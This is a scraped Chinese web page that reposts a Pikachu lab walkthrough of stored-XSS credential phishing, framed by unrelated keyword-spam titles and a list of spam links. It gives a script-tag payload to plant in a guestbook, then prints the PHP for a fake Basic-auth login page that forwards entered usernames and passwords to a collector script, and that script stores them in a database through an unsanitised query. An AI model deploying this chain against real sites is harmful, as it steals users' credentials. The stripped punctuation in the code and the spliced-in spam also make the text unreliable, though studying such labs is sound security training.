当前位置: 首页 > news >正文

做专题页的背景网站2023年楼市将迎来抛售潮

做专题页的背景网站,2023年楼市将迎来抛售潮,凡科网站案例,wordpress获取自定义分类名一、复现过程 1、payload script srchttp://127.0.0.1/pkxss/xfish/fish.php/script 将这段代码插入到含有储存xss的网页上#xff0c;如下留言板 2、此时恶意代码已经存入数据库#xff0c;并存在网页中#xff0c;当另一个用户打开这个网页…一、复现过程 1、payload script srchttp://127.0.0.1/pkxss/xfish/fish.php/script 将这段代码插入到含有储存xss的网页上如下留言板 2、此时恶意代码已经存入数据库并存在网页中当另一个用户打开这个网页时就会触发xss恶意代码被跳转的另一个页面并弹出登入框 3、这个时候如果输入账号密码就会被恶意构造的后台窃取储存 二、分析流程 1、fish.php文件源码分析这是恶意构造的页面即恶意插入xss代码中的url127.0.0.1/pkxss/xfish/fish.php 即复现步骤2的恶意构造登入页面的源码 这是一个basic认证你输入账号密码时会将这些信息记录并重定向到http://127.0.0.1/pkxss/xfish/xfish.php?页面 ?php error_reporting(0); // var_dump($_SERVER); if ((!isset($_SERVER[PHP_AUTH_USER])) || (!isset($_SERVER[PHP_AUTH_PW]))) { //发送认证框并给出迷惑性的infoheader(Content-type:text/html;charsetutf-8);header(WWW-Authenticate: Basic realm认证);header(HTTP/1.0 401 Unauthorized);echo Authorization Required.;exit; } else if ((isset($_SERVER[PHP_AUTH_USER])) (isset($_SERVER[PHP_AUTH_PW]))){ //将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IPheader(Location: http://127.0.0.1/pkxss/xfish/xfish.php?username{$_SERVER[PHP_AUTH_USER]}password{$_SERVER[PHP_AUTH_PW]}); }? 2、xfish.php他会获取到传入过来的账号密并将这些存入数据库 ?php error_reporting(0); include_once ../inc/config.inc.php; include_once ../inc/mysql.inc.php; $linkconnect();if(!empty($_GET[username]) !empty($_GET[password])){$username$_GET[username];$password$_GET[password];$referer;$referer.$_SERVER[HTTP_REFERER];$timedate(Y-m-d g:i:s);$queryinsert fish(time,username,password,referer) values($time,$username,$password,$referer);$resultmysqli_query($link, $query); }? 总结 1、在含有xss漏洞页面插入一个一个恶意script代码代码会触发跳转页到恶意页面
http://www.dnsts.com.cn/news/254674.html

相关文章:

  • 做的好微信商城网站ps做电商网站流程图
  • 建站之星模板制作wordpress h5制作插件
  • wordpress更改头像爱站seo工具包免费版
  • 阿里巴巴怎么做不花钱的网站公司网站建设应包含哪几个板块
  • 潍坊建设工程信息网站在线设计头像
  • 怎么查网站域名备案知名的传媒行业网站开发
  • 做暧嗳xo小视频免费网站十堰seo优化
  • 网站页面建设需要ps吗设计公司灰白色调网站
  • 数据网站有哪些百度云wordpress怎么搭建
  • 网站推广短信分公司注册流程网上注册
  • 做一个免费网站的流程python做网站还是数据
  • 学做烤制食品的网站wordpress 动态加载
  • 珠海市网站建设品牌凌风wordpress视频
  • 做暧暖的免费网站网站建设页面设计
  • 在pc端预览手机网站linux新建网站
  • 织梦新闻门户网站模板 原创精品网站界面是什么做的
  • 做跨境电商的人才网站做球形全景的网站
  • 做海岛旅游预定网站的百度优化师
  • 网站建设学习视频沧州企业做网站
  • 家具营销型网站9个常用的wordpress sql查询命令
  • vps搭建个人网站网站后台默认用户名
  • 建设机械网站策划网页制作的教程视频
  • 超全的开源建站系统大全个人可以做外贸的网站
  • 免费起名网最好的网站如何做一个单页面的网站
  • 冷水滩城乡建设局网站网站建设案例哪家好
  • 怎么给公司做简单网站wordpress 主题 标签
  • 北京好用的h5建站小程序代理设置
  • 网站建设通知书pc端网站开发技术
  • 一站多通怎么做网站湘潭网站建设厦门网站制作
  • 网站打开有声音是怎么做的wordpress数据库批量替换网址